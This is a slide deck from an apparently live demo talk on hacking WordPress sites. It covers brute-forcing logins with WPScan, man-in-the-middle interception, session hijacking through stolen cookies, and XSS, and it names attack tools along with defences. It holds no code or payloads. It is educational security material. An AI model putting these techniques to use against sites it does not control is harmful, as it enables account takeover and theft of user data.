Upload
analytive
View
419
Download
1
Embed Size (px)
Citation preview
Hacking WordpressA crash course in Web Application hacking.
DisclaimerThis information is given for strictly
educational purposes only. It is not cool (and is illegal) to hack sites that you don’t
own or control. All the sites we’ll hack tonight have been setup specifically for the purpose
of hacking and contain no sensitive data.
Disclaimer #2We will be conducting most of our
tests in real time. We’ve tested them extensively, but an any moment something may go wrong. We
apologize in advance.
OWASP Top 10
Tonight We’ll Do:
• Brute Force Password Attacking
• Man-In-The-Middle Attacks
• Session Hijacking (via cookie jacking)
• XSS
Brute Force AttacksA common approach (brute-force attack) is to try
guesses repeatedly for the password and check them against an available cryptographic hash of the
password.
Brute Forcing Wordpress
• Wordpress has no built in Brute Force defense
• You can install some plugins to reduce the risk of a brute force attack.
• We’ll be brute forcing Wordpress using WP-Scan
Preventing Brute Force Attacks
• Use strong passwords (also encourage users to use strong passwords)
• Use unique passwords
• Limit login attempts by user/IP with email reset
Let’s Demonstrate
What is a Man-in-the-Middle Attack?
User Makes Request
Server Sends Response
What is a Man-in-the-Middle Attack?
User Makes Request
Server Sends ResponseAttacker can intercept
and *change* communication
Let’s Demonstrate
How can someone get “in the middle”?
• WiFi Sniffing/Wifi Pineapple
• Network Administrators
• ISP/Governments
• Datacenters
Session HijackingSession hijacking, also known as TCP session hijacking,
is a method of taking over a Web user session by surreptitiously obtaining the session ID and
masquerading as the authorized user.
HTTP is a stateless protocol.
That means we have to reauthenticate every time we make a request.
We do this using cookies:
Session Hijacking
User authenticates with username and password
Once verified, server sends authentication cookie to user
On all future requests, user sends the cookie to ensure that they are
authenticated
Session Hijacking
User authenticates with username and password
Once verified, server sends authentication cookie to user
On all future requests, user sends the cookie to ensure that they are
authenticated
If we can steal this cookie,
we can become the user.
Let’s Demonstrate
Preventing Man-in-the-Middle and Session Hijacking
• Use HTTPS site wide!!!!
• Set Cookies to “HTTP only”
• Set Cookies to “Secure”
XSS AttackCross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web
pages viewed by other users.
XSS Attacks• The attacker installs a small snippet of malicious
javascript that runs on the client (your) browser
• Attacks allow us to:
• Steal cookies
• Log keypresses
• Trick the user into taking an action
Let’s Demonstrate
Protecting From XSS• Developer:
• Sanitize all inputs (use a LIBRARY!!!)
• Sanitize all outputs
• User
• Browser provide some level or protection
• Be skeptical of anything that asks you to enter information
Tools• Beef - http://beefproject.com/
• WpScan - http://wpscan.org/
• Burp Suite - https://portswigger.net/burp/
• Edit This Cookie (Chrome) - https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en
Further Reading• Troy Hunt - http://www.troyhunt.com/
• Brian Krebs - http://krebsonsecurity.com/
• Courses:
• Troy’s courses on Plural Sight - https://www.pluralsight.com/authors/troy-hunt
• One Month Web Security - https://onemonth.com/courses/web-security